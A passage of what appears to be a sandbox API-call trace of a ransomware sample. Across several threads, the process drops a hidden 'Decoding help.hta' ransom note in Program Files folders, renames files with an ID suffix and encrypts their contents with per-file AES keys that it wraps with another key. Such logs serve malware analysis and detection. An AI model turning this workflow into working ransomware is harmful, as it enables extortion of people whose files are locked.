ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14600 [0058.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.655] FindNextFileW (in: hFindFile=0x10f14600, lpFindFileData=0x2224fd30 | out: lpFindFileData=0x2224fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.656] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.656] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.656] FindNextFileW (in: hFindFile=0x10f14600, lpFindFileData=0x2224fd30 | out: lpFindFileData=0x2224fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00e4400, ftCreationTime.dwHighDateTime=0x1c9db16, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00e4400, ftLastWriteTime.dwHighDateTime=0x1c9db16, nFileSizeHigh=0x0, nFileSizeLow=0x3140, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.656] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*" [0058.656] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*") returned 70 [0058.656] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\Decoding help.hta" [0058.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\decoding help.hta")) returned 0xffffffff [0058.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcc4 [0058.656] WriteFile (in: hFile=0xcc4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2224fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2224fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.657] CloseHandle (hObject=0xcc4) returned 1 [0058.657] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.657] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.657] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.657] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*" [0058.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*") returned 70 [0058.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" [0058.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" [0058.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcc4 [0058.658] CreateFileMappingA (hFile=0xcc4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xcc8 [0058.659] CryptAcquireContextA (in: phProv=0x2224fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2224fcec*=0x10e27e00) returned 1 [0060.235] CryptGenKey (in: hProv=0x10e27e00, Algid=0x6610, dwFlags=0x1, phKey=0x2224fce8 | out: phKey=0x2224fce8*=0x10f14640) returned 1 [0060.235] CryptExportKey (in: hKey=0x10f14640, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2224fbe4, pdwDataLen=0x2224fce4 | out: pbData=0x2224fbe4*, pdwDataLen=0x2224fce4*=0x2c) returned 1 [0060.235] MapViewOfFile (hFileMappingObject=0xcc8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3140) returned 0x4d20000 Thread: id = 798 os_tid = 0x98c [0054.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*.*", lpFindFileData=0x2238fd30 | out: lpFindFileData=0x2238fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbf18 [0062.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.548] FindNextFileW (in: hFindFile=0x10fbbf18, lpFindFileData=0x2238fd30 | out: lpFindFileData=0x2238fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.548] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.548] FindNextFileW (in: hFindFile=0x10fbbf18, lpFindFileData=0x2238fd30 | out: lpFindFileData=0x2238fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a2e300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17a2e300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xd0e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIXEL.ELM", cAlternateFileName="")) returned 1 Thread: id = 799 os_tid = 0x988 [0054.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*", lpFindFileData=0x2264fd30 | out: lpFindFileData=0x2264fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc798 [0059.396] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.396] FindNextFileW (in: hFindFile=0x10fbc798, lpFindFileData=0x2264fd30 | out: lpFindFileData=0x2264fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.396] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.396] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.396] FindNextFileW (in: hFindFile=0x10fbc798, lpFindFileData=0x2264fd30 | out: lpFindFileData=0x2264fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.396] lstrcpyW (in: lpString1=0x24fe73c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*" [0059.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*") returned 64 [0059.396] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Decoding help.hta" [0059.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\decoding help.hta")) returned 0xffffffff [0059.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.648] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2264fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2264fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.649] CloseHandle (hObject=0x4bc) returned 1 [0060.649] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.872] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.872] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*" [0060.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*.*") returned 64 [0060.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" [0060.872] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" [0060.872] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.874] FindNextFileW (in: hFindFile=0x10fbc798, lpFindFileData=0x2264fd30 | out: lpFindFileData=0x2264fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.874] FindClose (in: hFindFile=0x10fbc798 | out: hFindFile=0x10fbc798) returned 1 Thread: id = 800 os_tid = 0xaa4 [0054.547] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*", lpFindFileData=0x228cfd30 | out: lpFindFileData=0x228cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db738 [0056.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.848] FindNextFileW (in: hFindFile=0x5db738, lpFindFileData=0x228cfd30 | out: lpFindFileData=0x228cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.848] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.848] FindNextFileW (in: hFindFile=0x5db738, lpFindFileData=0x228cfd30 | out: lpFindFileData=0x228cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.848] lstrcpyW (in: lpString1=0x9aa30e0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*" [0056.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*") returned 63 [0056.848] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Decoding help.hta" [0056.848] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\decoding help.hta")) returned 0xffffffff [0056.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb30 [0058.339] WriteFile (in: hFile=0xb30, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x228cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x228cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.340] CloseHandle (hObject=0xb30) returned 1 [0058.340] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.340] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.340] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.340] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*" [0058.340] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*.*") returned 63 [0058.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" [0058.340] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" [0058.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb30 [0058.341] CreateFileMappingA (hFile=0xb30, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb34 [0058.341] CryptAcquireContextA (in: phProv=0x228cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x228cfcec*=0x2aac56f8) returned 1 [0060.202] CryptGenKey (in: hProv=0x2aac56f8, Algid=0x6610, dwFlags=0x1, phKey=0x228cfce8 | out: phKey=0x228cfce8*=0x5fca260) returned 1 [0060.202] CryptExportKey (in: hKey=0x5fca260, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x228cfbe4, pdwDataLen=0x228cfce4 | out: pbData=0x228cfbe4*, pdwDataLen=0x228cfce4*=0x2c) returned 1 [0060.202] MapViewOfFile (hFileMappingObject=0xb34, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.195] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x228cfbe4*, pdwDataLen=0x228cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x228cfbe4*, pdwDataLen=0x228cfcf8*=0x100) returned 1 [0064.195] CryptEncrypt (in: hKey=0x5fca260, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x228cfce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x228cfce4*=0x140) returned 1 [0064.195] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.198] CloseHandle (hObject=0xb34) returned 1 [0064.198] CryptDestroyKey (hKey=0x5fca260) returned 1 [0064.198] CryptReleaseContext (hProv=0x2aac56f8, dwFlags=0x0) returned 1 [0064.198] SetFilePointerEx (in: hFile=0xb30, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.198] WriteFile (hFile=0xb30, lpBuffer=0x228cfbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x228cfcf8, lpOverlapped=0x0) Thread: id = 801 os_tid = 0xab4 [0054.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*", lpFindFileData=0x22c8fd30 | out: lpFindFileData=0x22c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc858 [0059.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.399] FindNextFileW (in: hFindFile=0x10fbc858, lpFindFileData=0x22c8fd30 | out: lpFindFileData=0x22c8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.399] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.399] FindNextFileW (in: hFindFile=0x10fbc858, lpFindFileData=0x22c8fd30 | out: lpFindFileData=0x22c8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, 